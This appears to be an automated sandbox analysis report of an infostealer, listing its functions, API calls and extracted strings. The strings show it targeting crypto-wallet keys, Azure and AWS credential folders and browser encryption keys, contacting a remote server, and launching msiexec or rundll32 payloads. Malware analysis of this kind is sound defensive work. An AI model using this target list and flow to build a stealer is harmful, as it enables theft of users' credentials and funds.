                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,012DC940,00000000,?,0051144C,00000000,?,?), ref: 004FCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004FCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004FCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004FCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004FCAD9
                                • StrStrA.SHLWAPI(?,012DC958,00510B52), ref: 004FCAF7
                                • StrStrA.SHLWAPI(00000000,012DCA90), ref: 004FCB1E
                                • StrStrA.SHLWAPI(?,012DD6B8,00000000,?,00511458,00000000,?,00000000,00000000,?,012D8830,00000000,?,00511454,00000000,?), ref: 004FCCA2
                                • StrStrA.SHLWAPI(00000000,012DD798), ref: 004FCCB9
                                  • Part of subcall function 004FC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004FC871
                                  • Part of subcall function 004FC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004FC87C
                                • StrStrA.SHLWAPI(?,012DD798,00000000,?,0051145C,00000000,?,00000000,012D8860), ref: 004FCD5A
                                • StrStrA.SHLWAPI(00000000,012D8AB0), ref: 004FCD71
                                  • Part of subcall function 004FC820: lstrcat.KERNEL32(?,00510B46), ref: 004FC943
                                  • Part of subcall function 004FC820: lstrcat.KERNEL32(?,00510B47), ref: 004FC957
                                  • Part of subcall function 004FC820: lstrcat.KERNEL32(?,00510B4E), ref: 004FC978
                                • lstrlen.KERNEL32(00000000), ref: 004FCE44
                                • CloseHandle.KERNEL32(00000000), ref: 004FCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 831781cee902fe5c6ecec537470446fb47bc87edf8aebcad5270110a2a2d519d
                                • Instruction ID: c3387fb3dc4ac5669d24c21cd669807623502d5ec88870027257425c390e4962
                                • Opcode Fuzzy Hash: 831781cee902fe5c6ecec537470446fb47bc87edf8aebcad5270110a2a2d519d
                                • Instruction Fuzzy Hash: A5E10172D10209ABDB14EBA4DC9AFEEBB78BF54300F408159F106671D1EF346A4ACB65
                                Function 00508320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • RegOpenKeyExA.ADVAPI32(00000000,012DAC00,00000000,00020019,00000000,005105B6), ref: 005083A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00508426
                                • wsprintfA.USER32 ref: 00508459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0050847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0050848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00508499
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 2082caef292d38d025dc05539fd168fffc5bbcd430b95b228c0108477c8fcaca
                                • Instruction ID: e6a4f51aaac03836bd41b5f4198a041a43499567fe05e6b5721593354dedea92
                                • Opcode Fuzzy Hash: 2082caef292d38d025dc05539fd168fffc5bbcd430b95b228c0108477c8fcaca
                                • Instruction Fuzzy Hash: 5C810B71910218ABEB24DB50CD95FEEBBB8FF58700F00C698E149A6180DF756B85CFA5
                                Function 00504D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00504DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00504DCD
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 0050492C
                                  • Part of subcall function 00504910: FindFirstFileA.KERNEL32(?,?), ref: 00504943
                                • lstrcat.KERNEL32(?,00000000), ref: 00504E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00504E59
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FDC), ref: 00504971
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FE0), ref: 00504987
                                  • Part of subcall function 00504910: FindNextFileA.KERNEL32(000000FF,?), ref: 00504B7D
                                  • Part of subcall function 00504910: FindClose.KERNEL32(000000FF), ref: 00504B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00504EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00504EE5
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 005049B0
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,005108D2), ref: 005049C5
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 005049E2
                                  • Part of subcall function 00504910: PathMatchSpecA.SHLWAPI(?,?), ref: 00504A1E
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,012DE320), ref: 00504A4A
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,00510FF8), ref: 00504A5C
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,?), ref: 00504A70
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,00510FFC), ref: 00504A82
                                  • Part of subcall function 00504910: lstrcat.KERNEL32(?,?), ref: 00504A96
                                  • Part of subcall function 00504910: CopyFileA.KERNEL32(?,?,00000001), ref: 00504AAC
                                  • Part of subcall function 00504910: DeleteFileA.KERNEL32(?), ref: 00504B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: c779506257512f446941b37081ec9b9da8fb5a4cb85a8576ab472fe6423c0000
                                • Instruction ID: 434308f163bf2f0e6a423b96f54acf682cbd78aa71ee0e240333853871026950
                                • Opcode Fuzzy Hash: c779506257512f446941b37081ec9b9da8fb5a4cb85a8576ab472fe6423c0000
                                • Instruction Fuzzy Hash: A04183BA94020867D750F770DC4BFED3A38BB64700F404594B289660C1EEB59BC98B96
                                Function 00509010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0050906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 2e630800738818b7d46b311794bd0cadc9cc16f98219971f7c3d3bcae80a9d2f
                                • Instruction ID: 7aecce4c32fcb039f0cd2656886e97be152f5581ff916b3323f370f424b40317
                                • Opcode Fuzzy Hash: 2e630800738818b7d46b311794bd0cadc9cc16f98219971f7c3d3bcae80a9d2f
                                • Instruction Fuzzy Hash: 2D71FB75A00209FBDB04DBE4DC89FEEBBB9BF48301F108508F655A7294DB39A905CB65
                                Function 00502E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 005031C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 0050335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 005034EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: a71da134f1d0caf5d86bb97fc5dac8536a166b5eb56753d27061dd725e8715ba
                                • Instruction ID: eea7926ac5af3cef016981c8b8399151a1da2ecbd371fd7ef55356b08ac8c7bc
                                • Opcode Fuzzy Hash: a71da134f1d0caf5d86bb97fc5dac8536a166b5eb56753d27061dd725e8715ba
                                • Instruction Fuzzy Hash: F51223719102099ADB05FBA0CD9AFEEBB38BFA4300F508559F506661D1EF742B4ACF52
                                Function 005052C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F6280: InternetOpenA.WININET(00510DFE,00000001,00000000,00000000,00000000), ref: 004F62E1
                                  • Part of subcall function 004F6280: StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6303
                                  • Part of subcall function 004F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6335
                                  • Part of subcall function 004F6280: HttpOpenRequestA.WININET(00000000,GET,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F6385
                                  • Part of subcall function 004F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004F63BF
                                  • Part of subcall function 004F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F63D1
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505318
                                • lstrlen.KERNEL32(00000000), ref: 0050532F
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00505364
                                • lstrlen.KERNEL32(00000000), ref: 00505383
                                • lstrlen.KERNEL32(00000000), ref: 005053AE
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 9add5a15db74e308ded79922162993754764daae67a9d06e21f80bc40ad540fc
                                • Instruction ID: 06230bc272dbb5c99b6910a5628deb9728d5446d14aefd91a95765fd2feb8b46
                                • Opcode Fuzzy Hash: 9add5a15db74e308ded79922162993754764daae67a9d06e21f80bc40ad540fc
                                • Instruction Fuzzy Hash: 4351FB30910249ABDB14EF60CD9AEEE7B79FF94301F508018E9065A5D1EF346B46CB66
                                Function 005012D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c0584190a0d747132cb9bb377432145726a8245bd8657e2fb0db9936c8686d2a
                                • Instruction ID: b8df89b2506a9dacacc40917c4d94b9cd87291218b2bbb6be8fc670e1ddac8c0
                                • Opcode Fuzzy Hash: c0584190a0d747132cb9bb377432145726a8245bd8657e2fb0db9936c8686d2a
                                • Instruction Fuzzy Hash: A8C154B590021AABCB14EF60DC8EFEE7778BFA4304F104598F50A671C1DA74AA85CF95
                                Function 00504280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 005042EC
                                • lstrcat.KERNEL32(?,012DDCE0), ref: 0050430B
                                • lstrcat.KERNEL32(?,?), ref: 0050431F
                                • lstrcat.KERNEL32(?,012DC988), ref: 00504333
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 00508D90: GetFileAttributesA.KERNEL32(00000000,?,004F1B54,?,?,0051564C,?,?,00510E1F), ref: 00508D9F
                                  • Part of subcall function 004F9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004F9D39
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                  • Part of subcall function 005093C0: GlobalAlloc.KERNEL32(00000000,005043DD,005043DD), ref: 005093D3
                                • StrStrA.SHLWAPI(?,012DDD28), ref: 005043F3
                                • GlobalFree.KERNEL32(?), ref: 00504512
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9AEF
                                  • Part of subcall function 004F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004F4EEE,00000000,?), ref: 004F9B01
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9B2A
                                  • Part of subcall function 004F9AC0: LocalFree.KERNEL32(?,?,?,?,004F4EEE,00000000,?), ref: 004F9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 005044A3
                                • StrCmpCA.SHLWAPI(?,005108D1), ref: 005044C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 005044D2
                                • lstrcat.KERNEL32(00000000,?), ref: 005044E5
                                • lstrcat.KERNEL32(00000000,00510FB8), ref: 005044F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: d561a0bb1182e2b51f8b51bddee63d872686ae216211e55d81f6ba74546f4d71
                                • Instruction ID: df3dc64ddae9c255f4252bb8bf6cc611fbd72a50fb87bd0e4b43c92f0007241b
                                • Opcode Fuzzy Hash: d561a0bb1182e2b51f8b51bddee63d872686ae216211e55d81f6ba74546f4d71
                                • Instruction Fuzzy Hash: B37133B6900208BBDB14FBA0DC8AFEE7779BB88300F048598F64597181EA75DB45CF95
                                Function 004F1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004F12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F12B4
